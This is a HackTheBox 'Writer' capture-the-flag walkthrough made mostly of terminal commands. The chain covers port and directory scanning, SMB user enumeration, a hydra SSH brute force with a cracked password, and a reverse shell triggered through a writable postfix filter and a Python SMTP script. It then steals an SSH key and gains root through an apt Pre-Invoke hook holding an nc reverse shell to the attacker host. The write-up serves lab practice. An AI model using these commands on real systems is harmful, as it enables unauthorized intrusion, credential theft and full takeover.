HackTheBox – Writer Walkthrough
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A -v -T4 -Pn 10.10.11.101
┌──(rootkali)-[/home/kali/Downloads]
└─# echo "10.10.11.101 writer.htb" >> /etc/hosts
┌──(rootkali)-[/home/kali/Downloads]
└─# wfuzz -w /usr/share/dirb/wordlists/big.txt -u http://writer.htb/FUZZ --hc 404 -t 200
http://writer.htb/administrative
Now SMB enumeration
┌──(rootkali)-[/home/kali/Downloads]
└─# smbmap -H writer.htb -R
┌──(rootkali)-[/home/kali/Downloads]
└─# rpcclient -U "" -N writer.htb
rpcclient $> help
rpcclient $> enumdomusers
rpcclient $> queryuser kyle
┌──(rootkali)-[/home/kali/Downloads]
└─# hydra -l kyle -P rockyou.txt ssh://writer.htb -VV -f -t 60
Username: kyle
Password: marcoantonio
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh kyle@10.10.11.101
kyle@writer:/tmp$ find / -type f -group filter 2>/dev/null
kyle@writer:/tmp$ cat /etc/postfix/disclaimer
Reading /etc/postfix/disclaimer shows it is the script postfix runs as a content filter on mail passing through the server, and the filter group kyle belongs to can write to it. Simply appending a reverse shell to it is not enough: a cron job restores the script to its default state shortly afterwards, so the modified copy has to be installed and a mail sent straight away, before the reset. The Python script below sends that mail through the local SMTP server on port 25; when postfix hands the message to the filter, the reverse shell in the script runs as john, the account the filter executes under, and that is the shell that comes back on the listener.
Code: shell.py
import smtplib

host = '127.0.0.1'
port = 25
sender_email = "kyle@writer.htb"
receiver_email = "kyle@writer.htb"

# Any message delivered through the local postfix is handed to its content
# filter, which is /etc/postfix/disclaimer; sending one mail is enough to run
# whatever we put in that script. The blank line separates headers from body.
message = """\
Subject: Hi there

Test_python_sender."""

server = None
try:
    server = smtplib.SMTP(host, port)
    server.ehlo()
    server.sendmail(sender_email, receiver_email, message)
except Exception as e:
    print(e)
finally:
    # only quit if the connection was actually opened
    if server is not None:
        server.quit()
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -lvnp 1234
kyle@writer:/tmp$ cp disclaimer /etc/postfix/disclaimer && python3 shell.py
john@writer:/var/spool/postfix$ cd /home/john/.ssh/
john@writer:/home/john/.ssh$ ls -lrt
john@writer:/home/john/.ssh$ cat id_rsa
┌──(rootkali)-[/home/kali/Downloads]
└─# chmod 600 id_rsa
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh john@10.10.11.101 -i id_rsa
john@writer:~$ find / -type d -group management 2>/dev/null
https://github.com/DominicBreuker/pspy
john@writer:~$ cd /tmp
john@writer:/tmp$ wget http://10.10.14.14:8000/pspy32
john@writer:/tmp$ chmod +x pspy32
john@writer:/tmp$ ./pspy32
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -lvnp 9000
The hook below relies on what pspy reveals: root periodically runs apt-get update from cron. apt reads every fragment in /etc/apt/apt.conf.d/, which the management group (and so john) can write to, and runs any APT::Update::Pre-Invoke command as root before the update. Replace the IP with yours, start nc or pwncat on the port in a separate terminal first, then write the fragment and wait for the next cron run.
john@writer:/tmp$ cd /etc/apt/apt.conf.d/
john@writer:/etc/apt/apt.conf.d$ echo 'APT::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 9000 >/tmp/f";};' > /etc/apt/apt.conf.d/shell